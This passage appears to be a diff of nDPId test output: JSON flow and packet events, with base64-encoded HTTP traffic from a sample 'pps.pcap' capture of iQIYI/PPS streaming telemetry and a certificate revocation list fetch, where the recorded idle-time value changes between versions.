-01846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1467353170523,"pkt":"TF4M6gNlABxCjnAxCABFAAQ7HjFAAIAGHsHAqHMIb84WTMVDAFDdQoxSQH15t1AYQTfZKwAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmcm49MTQ2NzM1MzE2NzIyMSZhPTM0JmNsdD10dmcyMDE1X2JhaWtlQl9jb21tZW50X3Nob3cmdHlwZT1wYyZyZWY9bm9yZWYmdXJsPWh0dHAlM0EvL3ZvZGd1aWRlLnBwcy5pcWl5aS5jb20vcGFnZS5waHAlM0Z2ZXJzaW9uJTNENS4yLjE1LjIyNDAlMjNjbGFzcyUzRDIwMDAwMzcxOSUyNTI0JTI1MjQlMjUyNCUyNTI0MTgwOTMyMzAxJTI2ZW50aXR5aWQlM0Q0Nzk1MzEwMDAlMjZiYWlrZWlkJTNEMjAzMjI5NDkwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} -01506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"thread_ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZXJpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\/kkVyVAYQTfM+gAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNzIwNTEmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7560000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"thread_ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\/dHlwZT1yZWNjdHBsYXkyMDEyMTIyNiZ1c3JhY3Q9c2hvdyZwcHVpZD0tMSZ1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mZXZlbnRfaWQ9NGIwODY4OTIwYjBmODI4NTMyMGE5ZTAwZWUwMzY5ZTUmY2lkPTMxJmJrdD1wcHNfY196ZWJyYV9tYWluX2RlZmF1bHQmYXJlYT1wcHNfY196ZWJyYSZwbGF0Zm9ybT0yMDEyJmFsYnVtbGlzdD00NzA2OTQ1MDAsNDcxNTkxMzAwLDQ2NTY0MTAwMCw0NzI4ODcxMDAsNDcxNzg4MTAwLDQ3Mzc0NjMwMCw0NzE5NDgzMDAsNDczNjk0NjAwLDQ3MjE4OTUwMCZhaWQ9NDc5NTMxMDAwJnNvdXJjZT0wLDEsMSwxLDEsMSwxLDEsMSZfPTE0NjczNTMxNjcwODcgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLnZpZGVvLnFpeWkuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7560000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7560000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1467353170523,"pkt":"TF4M6gNlABxCjnAxCABFAAQ7HjFAAIAGHsHAqHMIb84WTMVDAFDdQoxSQH15t1AYQTfZKwAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmcm49MTQ2NzM1MzE2NzIyMSZhPTM0JmNsdD10dmcyMDE1X2JhaWtlQl9jb21tZW50X3Nob3cmdHlwZT1wYyZyZWY9bm9yZWYmdXJsPWh0dHAlM0EvL3ZvZGd1aWRlLnBwcy5pcWl5aS5jb20vcGFnZS5waHAlM0Z2ZXJzaW9uJTNENS4yLjE1LjIyNDAlMjNjbGFzcyUzRDIwMDAwMzcxOSUyNTI0JTI1MjQlMjUyNCUyNTI0MTgwOTMyMzAxJTI2ZW50aXR5aWQlM0Q0Nzk1MzEwMDAlMjZiYWlrZWlkJTNEMjAzMjI5NDkwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7560000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg